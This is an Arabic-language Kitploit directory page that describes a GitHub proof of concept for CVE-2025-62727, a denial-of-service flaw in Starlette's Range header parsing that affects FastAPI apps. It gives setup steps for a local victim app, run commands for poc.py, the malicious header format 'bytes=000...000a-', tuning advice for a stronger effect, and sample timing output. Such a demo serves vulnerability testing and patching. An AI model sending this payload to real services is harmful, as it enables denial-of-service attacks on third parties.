Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-62727-Demo — إثبات مفهوم لـ CVE-2025-62727 الذي يمكن أن يسبب رفض الخدمة في FastAPI (المبني على Starlette <= 0.48.0) | Kitploit
أدوات/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
تحليل الثغرات الأمنيةالاستغلالأمن الويبأمن واجهات برمجة التطبيقات
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

إثبات مفهوم لـ CVE-2025-62727 الذي يمكن أن يسبب رفض الخدمة في FastAPI (المبني على Starlette <= 0.48.0)

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عرض توضيحي لـ CVE-2025-62727

وصف الضحية

الهدف الضحية لثغرة CVE-2025-62727 هو تطبيق FastAPI بسيط يقوم بـ:

  • تقديم Hello World في المسار /.
  • تقديم ملفات ثابتة تحت /static باستخدام StaticFiles من Starlette.
  • إنشاء ملفات نصية تلقائيًا تحتوي على الحرف A مكرر N مرة حيث N في 1024, 2048, 50176 عند بدء التشغيل.

كيفية تشغيل الضحية

  1. (اختياري) إنشاء وتفعيل بيئة افتراضية (virtualenv).

  2. تثبيت التبعيات:

    root@kitploit:~
    pip install -r requirements.txt
    
  • تشغيل الخادم:

    root@kitploit:~
    uvicorn main:app --reload
    
  • افتح:

    • http://127.0.0.1:8000/ لصفحة الفهرس.
    • http://127.0.0.1:8000/static/1024.txt إلخ للملفات الثابتة.

    ملاحظات

    • يتم إنشاء الملفات الثابتة تحت دليل static/ عند بدء تشغيل التطبيق. لا يتم استبدال الملفات الموجودة.
    • يتم تقديم الملفات الثابتة باستخدام StaticFiles من Starlette كما هو مطلوب.

    إثبات المفهوم: CVE-2025-62727 (تحليل رأس Range)

    يقوم ملف poc.py المرفق بتشغيل تحليل Range كثيف الاستهلاك للمعالجة في FileResponse من Starlette عبر مسار /static باستخدام رأس مخصص بالصيغة bytes=000...000a-.

    قم بتشغيل الخادم، ثم في نافذة أخرى:

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    تجاوز عنوان الهدف (اختياري):

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    ملاحظات:

    • يستهدف إثبات المفهوم http://127.0.0.1:8000/static/50176.txt افتراضيًا (ملف يولده التطبيق). استخدم --url لتغييره.
    • اضبط --sizes للأسفل إذا رأيت 400/431 (رأس كبير جدًا)، أو للأعلى إذا نجحت الرؤوس وتريد تأثيرًا أقوى.

    مثال على النتيجة:

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    تنزيل الأداة